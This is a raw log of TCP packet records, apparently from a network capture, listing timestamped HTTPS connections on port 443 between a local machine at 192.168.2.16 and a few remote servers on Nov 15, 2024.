                                                                                                            Nov 15, 2024 11:24:47.674211025 CET49809443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:47.674246073 CET49809443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:47.674628019 CET49809443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:47.674640894 CET44349809142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:47.675285101 CET49815443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:47.675374985 CET44349815142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:47.675939083 CET49815443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:47.676078081 CET49815443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:47.676104069 CET44349815142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:47.857202053 CET49816443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:47.857285023 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:47.857588053 CET49816443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:47.857588053 CET49816443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:47.857717991 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.090379000 CET44349811142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.090509892 CET49811443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.091471910 CET44349811142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.091542959 CET49811443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.094718933 CET49811443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.094748974 CET44349811142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.095273018 CET44349811142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.097462893 CET49811443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.097901106 CET49811443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.102587938 CET44349812142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.102684021 CET49812443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.103843927 CET44349812142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.103919983 CET49812443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.105407953 CET49812443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.105432034 CET44349812142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.105787992 CET44349812142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.105849028 CET49812443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.106208086 CET49812443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.120302916 CET44349813142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.120382071 CET49813443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.120645046 CET49813443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.120671034 CET44349813142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.120775938 CET49813443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.120790005 CET44349813142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.139342070 CET44349811142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.147336960 CET44349812142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.476676941 CET44349811142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.476778030 CET49811443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.476841927 CET49811443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.476950884 CET44349811142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.477021933 CET49811443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477087021 CET44349812142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.477160931 CET49812443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477194071 CET44349812142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.477256060 CET49812443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477287054 CET49812443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477356911 CET44349812142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.477406025 CET49819443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477407932 CET49812443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477437973 CET44349819142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.477499962 CET49819443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477649927 CET49820443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477739096 CET44349820142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.477792025 CET49819443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477803946 CET44349819142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.477813005 CET49820443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.477986097 CET49820443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.478018045 CET44349820142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.559452057 CET44349815142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.559545994 CET49815443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.560092926 CET49815443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.560125113 CET44349815142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.561778069 CET49815443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.561805964 CET44349815142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.607620955 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.608299017 CET49816443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:48.608376980 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.609390020 CET49816443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:48.609405041 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.661601067 CET44349813142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.661818027 CET44349813142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.661835909 CET49813443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.661906004 CET44349813142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.661938906 CET49813443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.661963940 CET49813443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.661976099 CET44349813142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.662025928 CET49813443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.662792921 CET49813443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.662864923 CET44349813142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.662923098 CET49813443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.663383961 CET49821443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.663470030 CET44349821142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.663577080 CET49821443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.663794994 CET49821443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.663827896 CET44349821142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.738778114 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.738797903 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.738904953 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.738970041 CET49816443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:48.738970041 CET49816443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:48.739191055 CET49816443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:48.739212990 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.739228964 CET49816443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:48.739236116 CET4434981613.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.784903049 CET49815443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.784918070 CET49820443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.784918070 CET49821443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.785022020 CET49819443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.785331964 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.785406113 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.785417080 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.785423040 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.785475969 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.785525084 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.785571098 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.785602093 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.785618067 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.943044901 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.943069935 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.943135023 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:48.943145037 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:48.943165064 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:48.943202019 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.800534964 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.800710917 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:49.802793026 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:49.802803993 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.803138018 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.803190947 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:49.803755045 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:49.811196089 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.811271906 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.811944962 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.812002897 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.813954115 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.813958883 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.814261913 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.814313889 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.814739943 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.818691969 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.818777084 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.821527004 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.821593046 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.825608015 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.825628042 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.826052904 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.826109886 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.826601982 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:49.847341061 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.855344057 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:49.871340036 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.182585001 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.182774067 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.182801008 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.182857037 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.182935953 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.182975054 CET44349823142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.183033943 CET49823443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.183590889 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.183681965 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.183778048 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.184021950 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.184041023 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.185291052 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.185312033 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.185379982 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.185619116 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.185643911 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.196460962 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.196548939 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.196557999 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.196599007 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.196656942 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.196721077 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.196751118 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.196801901 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.197453022 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.197551966 CET44349822142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.197613955 CET49822443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.200412989 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.200488091 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.200514078 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.200561047 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.200593948 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.200691938 CET44349824142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.200742006 CET49824443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.201036930 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.201059103 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.201124907 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.201173067 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.201258898 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.201322079 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.201359034 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:50.201381922 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:50.201642990 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:50.201677084 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.194998980 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.195120096 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.195780039 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.195849895 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.195914984 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.195976019 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.198468924 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.198494911 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.198848963 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.198911905 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.199431896 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.200223923 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.200234890 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.200619936 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.200695038 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.200851917 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.200928926 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.201025963 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.201268911 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.201364994 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.201922894 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.201980114 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.203051090 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.203078032 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.203376055 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.203386068 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.203603029 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.203691006 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.203803062 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.203874111 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.204010010 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.204237938 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.243369102 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.243375063 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.247350931 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.247375965 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.563723087 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.563931942 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.563997984 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.564062119 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.564133883 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.564198971 CET44349827142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.564260960 CET49827443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.564872980 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.564974070 CET44349830142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.565073013 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.565361977 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.565382957 CET44349830142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.582304001 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.582382917 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.582403898 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.582556009 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.582556009 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.582657099 CET44349825142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.582721949 CET49825443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.583000898 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.583072901 CET44349831142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.583148956 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.583389997 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:51.583424091 CET44349831142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.670954943 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.671041012 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.671071053 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.671124935 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.671139002 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.671186924 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.671199083 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.671247005 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.672348976 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.672465086 CET44349826142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.672533035 CET49826443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.672875881 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.672905922 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.672971010 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.673187017 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.673192978 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.835242033 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.835406065 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.835438013 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.835479021 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.835505962 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.835530043 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.835544109 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.835597992 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.836057901 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.836350918 CET44349828142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.836424112 CET49828443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.836639881 CET49833443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.836708069 CET44349833142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:51.836842060 CET49833443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.837096930 CET49833443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:51.837112904 CET44349833142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.447487116 CET44349830142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.447607994 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.448131084 CET44349830142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.448196888 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.451271057 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.451303005 CET44349830142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.451564074 CET44349830142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.451618910 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.451983929 CET49830443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.459026098 CET44349831142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.459121943 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.461725950 CET44349831142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.461806059 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.462976933 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.462994099 CET44349831142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.463507891 CET44349831142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.463567019 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.463835001 CET49831443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:52.495342970 CET44349830142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.507339001 CET44349831142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.526002884 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.526089907 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.527273893 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.527283907 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.528244972 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.528311014 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.528637886 CET49832443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.571333885 CET44349832142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.693519115 CET44349833142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.693659067 CET49833443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.695081949 CET49833443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.695097923 CET44349833142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.695310116 CET44349833142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.695377111 CET49833443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.695801973 CET49833443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:52.739339113 CET44349833142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:52.821631908 CET44349830142.250.185.78192.168.2.16
